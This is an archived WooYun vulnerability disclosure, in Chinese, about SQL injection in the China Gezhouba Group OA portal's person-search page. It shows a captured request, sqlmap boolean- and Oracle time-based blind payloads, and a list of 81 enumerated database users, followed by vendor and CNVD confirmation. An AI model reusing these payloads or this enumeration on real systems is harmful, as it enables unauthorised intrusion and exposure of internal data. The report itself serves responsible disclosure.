乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-12: 细节已通知厂商并且等待厂商处理中 2016-04-15: 厂商已经确认,细节仅向厂商公开 2016-04-25: 细节向核心白帽子及相关领域专家公开 2016-05-05: 细节向普通白帽子公开 2016-05-15: 细节向实习白帽子公开 2016-05-30: 细节向公众公开
RT
中国葛洲坝集团OA系统:http://**.**.**.**/portal/c
点击获取账号,然后重点来了,此处提供了姓名查询账号的功能
抓包内容:
POST /portal/html/portlets/searchPerson/search.jsp HTTP/1.1Host: **.**.**.**Content-Length: 34Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/portal/html/portlets/searchPerson/search.jspAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=0000xt-VcpfwJQY0baekj1_UW9z:-1keyword=%CD%F5&submit=%CC%E1%BD%BB
Place: POSTParameter: keyword Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keyword=%CD%F5%' AND 6138=6138 AND '%'='&submit=%CC%E1%BD%BB Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: keyword=%CD%F5%' AND 4512=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(102)||CHR(75)||CHR(103),5) AND '%'='&submit=%CC%E1%BD%BB---back-end DBMS: Oraclecurrent user is DBA: False Oracledatabase management system users [81]:[*] ANONYMOUS[*] APEX_030200[*] APEX_PUBLIC_USER[*] APPQOSSYS[*] BACKUP[*] BIDATA[*] BOCMS[*] CA_55[*] CGGCLAW[*] CGGCMCMS[*] CGGCMCMS_150619[*] CTXSYS[*] DBSNMP[*] DIB[*] DIBERM[*] DIP[*] ECHO[*] EMS_NEWS[*] EXFSYS[*] FLOWS_FILES[*] GZBDA[*] GZBDA1[*] GZBJCS[*] GZBSHINE[*] HRPLAN_GZB[*] HRPLAN_GZBAK[*] HRPLAN_GZBTES[*] JCS[*] JMETER[*] KEHAO[*] KJXXGL[*] KJXXST_TEST[*] KJXXST_TEST1[*] KJXXSTSYS[*] KJXXSTSYS_TEST[*] KJXXSTSYS_TEST1[*] KMP[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] NC55[*] NC55TEST[*] NC55WAS[*] NC63[*] NCCS[*] NCESB[*] NCESBTEST[*] NG0001[*] NG0002[*] NG0003[*] NG0004[*] NGSOFT[*] OLAPSYS[*] ORACLE_OCM[*] ORCL[*] ORDDATA[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] OWBSYS[*] OWBSYS_AUDIT[*] PORTAL631[*] PORTALTEST[*] PROJECTSOCIAL[*] RA_SERVER[*] SCOTT[*] SI_INFORMTN_SCHEMA[*] SOE[*] SPATIAL_CSW_ADMIN_USR[*] SPATIAL_WFS_ADMIN_USR[*] SYS[*] SYSMAN[*] SYSTEM[*] TEST[*] TSMSYS[*] USER01[*] WER123[*] WMSYS[*] XDB[*] XS$NULL[*] YQ
过滤。
危害等级:中
漏洞Rank:10
确认时间:2016-04-15 16:04
CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无